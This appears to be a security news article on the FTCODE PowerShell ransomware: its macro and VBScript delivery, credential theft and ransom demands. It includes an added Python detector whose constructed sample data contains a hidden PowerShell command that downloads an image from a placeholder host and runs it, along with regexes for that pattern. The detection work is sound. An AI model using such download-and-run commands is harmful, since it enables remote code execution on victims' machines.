Revamped Malware Targets Browsers and Email Clients
FTCODE, a ransomware strain that has been active since at least 2013, has recently been revamped to include new features, including the ability to steal credentials and passwords from web browsers and email clients, according to two research reports released this week.
Although the ransomware originally targeted Russian-speaking victims when it first appeared seven years ago, it has since spread to other countries. In new samples analyzed by Positive Technologies researchers, the updated FTCODE was targeting victims in Italy and elsewhere.
When examining these new ransomware samples, analysts found that FTCODE had recently been updated to steal credentials and passwords from popular browsers, including Microsoft Internet Explorer, Mozilla Firefox and Google Chrome, according to an analysis by Zscaler ThreatLabZ researchers Rajdeepsinh Dodia, Amandeep Kumar and Atinderpal Singh. The ransomware also has the ability to swipe passwords from Microsoft Outlook.
It’s not clear how many victims have been hit with this ransomware strain, but its ability to encrypt files as well as steal credentials and passwords has security analysts watching FTCODE more closely.
“The FTCODE ransomware campaign is rapidly changing,” the Zscaler analysis states. “Due to the scripting language it was written in, it offers multiple advantages to threat actors, enabling them to easily add or remove features or make tweaks much more easily than is possible with traditionally compiled malware.”
Starts With PowerShell
When Sophos researchers first spotted FTCODE in 2013, they determined that its creators had written the crypto-locking malware in PowerShell because the scripting language allows malicious code to run on an infected device without ever being saved as a file on the Windows file system, which limits what file-based antivirus scanning can see.
FTCODE’s infection chain works in a similar fashion to that of other ransomware families. In many cases, victims are sent spam emails carrying a malicious document attachment with macros, according to Positive Technologies. If the recipient opens the attachment and enables the macros, the macro code begins downloading the ransomware to the targeted device, according to the reports.
In the more recent cases, the Zscaler analysts found that the malware is now being downloaded through a VBScript, but FTCODE itself is still written in PowerShell. The malicious code is now hidden inside files served as JPEG images to better disguise the download.
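The delivery chain just described (macro-enabled document to a Windows script host to a PowerShell one-liner that fetches an "image" and executes it) is also what a defender should hunt for in process-creation telemetry. The following is an added example written for this page, not code from Zscaler, Positive Technologies or the FTCODE authors. It scores constructed Sysmon-style process events for three generic behaviours: an Office application spawning a script host, a script host spawning PowerShell, and a PowerShell command line that downloads content (here an image URL) and passes it to Invoke-Expression. All event records, paths and the `example.invalid` URL are made up for illustration; no FTCODE indicators are used.

```python
"""Detect an Office -> script host -> PowerShell download-and-run chain.

Constructed example: the events below imitate Sysmon Event ID 1 fields
(process creation) and are not real telemetry from any FTCODE infection.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    parent_pid: int
    image: str          # full path of the new process
    command_line: str


# Constructed sample events. A Word document with a macro launches a VBScript via
# wscript.exe, which launches PowerShell to download a ".jpg" and run its
# contents. pid 500 is a benign PowerShell run from explorer.exe as a negative case.
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 '"WINWORD.EXE" /n invoice.doc'),
    ProcessEvent(300, 200, r"C:\Windows\System32\wscript.exe",
                 "wscript.exe //B C:\\Users\\u\\AppData\\Local\\Temp\\x.vbs"),
    ProcessEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"$d=(New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/img.jpg'); iex $d\""),
    ProcessEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -File C:\\scripts\\backup.ps1"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# A command line that both fetches remote content and hands it to
# Invoke-Expression (or runs an encoded command) is the download-and-run pattern.
DOWNLOAD_RE = re.compile(
    r"(downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|net\.webclient)", re.I)
EXEC_RE = re.compile(r"(\biex\b|invoke-expression|-enc(odedcommand)?\b)", re.I)
IMAGE_URL_RE = re.compile(r"https?://\S+\.(jpe?g|png|gif|bmp)\b", re.I)


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(events, pid):
    """Return image basenames from `pid` up to the root of the process tree."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_basename(by_pid[pid].image))
        pid = by_pid[pid].parent_pid
    return chain


def score_event(events, ev):
    """Return the reasons an event looks suspicious; an empty list means benign."""
    reasons = []
    name = _basename(ev.image)
    parents = set(ancestry(events, ev.pid)[1:])
    if name in SCRIPT_HOSTS and parents & OFFICE_APPS:
        reasons.append("office app spawned script host")
    if name in POWERSHELL:
        if parents & SCRIPT_HOSTS:
            reasons.append("script host spawned powershell")
        if parents & OFFICE_APPS:
            reasons.append("powershell descends from office app")
        if DOWNLOAD_RE.search(ev.command_line) and EXEC_RE.search(ev.command_line):
            reasons.append("download-and-execute command line")
        if IMAGE_URL_RE.search(ev.command_line):
            reasons.append("powershell fetches an image URL")
    return reasons


def find_suspicious(events):
    """Map pid -> reasons for every event with at least one finding."""
    findings = {}
    for ev in events:
        reasons = score_event(events, ev)
        if reasons:
            findings[ev.pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(pid, "->".join(reversed(ancestry(SAMPLE_EVENTS, pid))), reasons)
```

Walking the parent chain rather than checking only the immediate parent matters here: the PowerShell process is two hops away from WINWORD.EXE, so a rule keyed on "Office spawned PowerShell" would miss it. The image-URL check is deliberately narrow; in production it should be one weak signal among several, since legitimate scripts do occasionally fetch images.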
Once the FTCODE ransomware is downloaded, it conducts basic reconnaissance of the infected device, connects to a command-and-control server and awaits instructions, according to Positive Technologies. The malware can encrypt a wide variety of file types, including .doc, .sql, .xls and several others, according to the report.
The research reports describe base64 in connection with the locked files; note that base64 is an encoding, not a cipher, so it cannot by itself protect encrypted data and would serve only to wrap the encrypted output or key material for transport. The stolen credentials and passwords are sent back to the attackers through an HTTP POST request, according to the research reports.
Once a device is infected with the FTCODE ransomware, the attackers send a note demanding payment through an anonymous Tor site, according to Positive Technologies.
FTCODE ransom note (Source: Zscaler)
The attackers using FTCODE typically demand an initial ransom of $500, paid in cryptocurrency, and the price steadily rises the longer the victim refuses to pay, according to Positive Technologies.
Positive Technologies researchers found that FTCODE installs a Trojan called JasperLoader, which can then download other malware, such as a separate banking Trojan, to an infected device.
In the last several months, researchers have noticed criminal gangs exfiltrating data from ransomware victims in an effort to encourage the victims to meet the ransom demands.
In one example from October, the Maze ransomware gang dumped almost 700 MB of data that it had stolen from Allied Universal, a California-based security services firm, and the group has threatened to do it again (see: Alarming Trend: More Ransomware Gangs Exfiltrating Data).